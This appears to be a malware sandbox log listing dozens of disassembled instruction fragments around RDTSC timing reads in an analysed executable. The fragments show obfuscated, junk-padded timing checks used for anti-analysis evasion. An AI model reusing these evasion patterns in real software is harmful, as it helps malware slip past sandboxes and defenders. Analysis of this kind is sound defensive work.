Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAFBA9 second address: AAFBCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pushad 0x0000000b jmp 00007F0E6551CA3Ah 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAFBCA second address: AAFBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAF300 second address: AAF319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E6551CA40h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB002F second address: AB0050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007F0E647B60A0h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0E647B6082h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB0050 second address: AB005A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E6551CA36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB01BD second address: AB01E2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0E647B6076h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F0E647B607Ch 0x00000012 jng 00007F0E647B6076h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0E647B607Ah 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB01E2 second address: AB01EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB0361 second address: AB0367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB0367 second address: AB0372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB0613 second address: AB063C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B607Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0E647B6087h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB063C second address: AB0646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0E6551CA36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB0646 second address: AB064A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABA76E second address: ABA772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABA772 second address: ABA778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABA778 second address: ABA781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A777B9 second address: A58FE9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F0E647B6085h 0x0000000c pop ebx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 ja 00007F0E647B607Ch 0x00000017 call dword ptr [ebp+12468A86h] 0x0000001d jmp 00007F0E647B607Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A77E55 second address: A77E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 xor dword ptr [esp], 2BA73ED7h 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F0E6551CA38h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov dword ptr [ebp+12450F58h], edi 0x0000002d and ecx, 161AB867h 0x00000033 push 824C85A1h 0x00000038 push ecx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A77F87 second address: A77F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F0E647B6078h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A77F96 second address: A77F9B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A77F9B second address: A77FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 mov edi, dword ptr [ebp+122D59E8h] 0x0000000e nop 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A78055 second address: A78072 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A78072 second address: A7808B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E647B6085h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A782FD second address: A78343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ecx, dword ptr [ebp+122D39A9h] 0x00000011 push 00000004h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F0E6551CA38h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d mov edx, dword ptr [ebp+12450F18h] 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0E6551CA3Eh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A78343 second address: A78349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A78349 second address: A7834D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A786E1 second address: A786EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A787F1 second address: A787FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F0E6551CA36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A78A36 second address: A78A8C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F0E647B6087h 0x0000000e jnc 00007F0E647B6078h 0x00000014 popad 0x00000015 nop 0x00000016 jmp 00007F0E647B6085h 0x0000001b lea eax, dword ptr [ebp+1248C4D4h] 0x00000021 jmp 00007F0E647B607Ch 0x00000026 nop 0x00000027 pushad 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A78A8C second address: A59B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E6551CA41h 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jno 00007F0E6551CA36h 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 jns 00007F0E6551CA54h 0x0000001c nop 0x0000001d mov edi, dword ptr [ebp+122D20C7h] 0x00000023 call dword ptr [ebp+122D306Dh] 0x00000029 jnp 00007F0E6551CA4Ah 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB9ADA second address: AB9AEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jg 00007F0E647B6076h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB9C37 second address: AB9C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E6551CA3Ch 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB9C49 second address: AB9C57 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E647B6076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB9C57 second address: AB9C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB9C5B second address: AB9C65 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E647B6076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB9DE6 second address: AB9DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E6551CA45h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB9DFF second address: AB9E3C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0E647B6084h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F0E647B6090h 0x00000014 jmp 00007F0E647B6088h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABC767 second address: ABC76C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABF941 second address: ABF94A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABF94A second address: ABF950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABF950 second address: ABF954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABF954 second address: ABF958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABF958 second address: ABF95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABF95E second address: ABF964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABF1C8 second address: ABF1D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABF1D0 second address: ABF1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABF1D4 second address: ABF1E4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E647B6076h 0x00000008 ja 00007F0E647B6076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABF1E4 second address: ABF206 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0E6551CA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABF607 second address: ABF611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0E647B6076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ABF611 second address: ABF615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A383FA second address: A383FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC6044 second address: AC6067 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Ch 0x00000007 pushad 0x00000008 jmp 00007F0E6551CA42h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC61BE second address: AC61C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E647B6076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC61C8 second address: AC61CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC61CC second address: AC61D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC61D8 second address: AC621B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F0E6551CA36h 0x00000009 jmp 00007F0E6551CA49h 0x0000000e jmp 00007F0E6551CA48h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC621B second address: AC6240 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6087h 0x00000007 ja 00007F0E647B6076h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC6240 second address: AC624A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0E6551CA36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC624A second address: AC6250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC6250 second address: AC6274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA48h 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F0E6551CA36h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC6274 second address: AC627A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC652E second address: AC6532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC6532 second address: AC6536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC8EE6 second address: AC8F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0E6551CA3Bh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e jng 00007F0E6551CA50h 0x00000014 jmp 00007F0E6551CA3Bh 0x00000019 popad 0x0000001a pushad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC90CC second address: AC90D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F0E647B6076h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC90D8 second address: AC90E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC9225 second address: AC922D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC922D second address: AC9236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC9236 second address: AC9240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0E647B6076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACD7EF second address: ACD809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E6551CA46h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACD809 second address: ACD81E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6081h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACDC03 second address: ACDC07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACDC07 second address: ACDC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACDC0D second address: ACDC18 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F0E6551CA36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A785CF second address: A785F2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0E647B607Ah 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jc 00007F0E647B607Ch 0x00000014 js 00007F0E647B6076h 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACDDB4 second address: ACDDB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACDDB9 second address: ACDDC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACDF3F second address: ACDF45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACDF45 second address: ACDF49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACDF49 second address: ACDF65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E6551CA42h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACE992 second address: ACE9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E647B607Bh 0x00000009 jmp 00007F0E647B6087h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ACE9B9 second address: ACE9D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0E6551CA36h 0x0000000a jmp 00007F0E6551CA44h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD3BA2 second address: AD3BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD4061 second address: AD408C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0E6551CA36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0E6551CA3Dh 0x0000000f pop ecx 0x00000010 push eax 0x00000011 jmp 00007F0E6551CA3Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007F0E6551CA36h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD432E second address: AD4334 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD4334 second address: AD4357 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F0E6551CA38h 0x00000010 pushad 0x00000011 jmp 00007F0E6551CA3Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD4357 second address: AD435D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD435D second address: AD4362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD4362 second address: AD4368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD4368 second address: AD436C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD436C second address: AD4372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD4372 second address: AD437C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD4660 second address: AD468C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B607Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F0E647B6078h 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 jmp 00007F0E647B607Fh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD468C second address: AD4697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD5425 second address: AD542B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD542B second address: AD543A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F0E6551CA36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
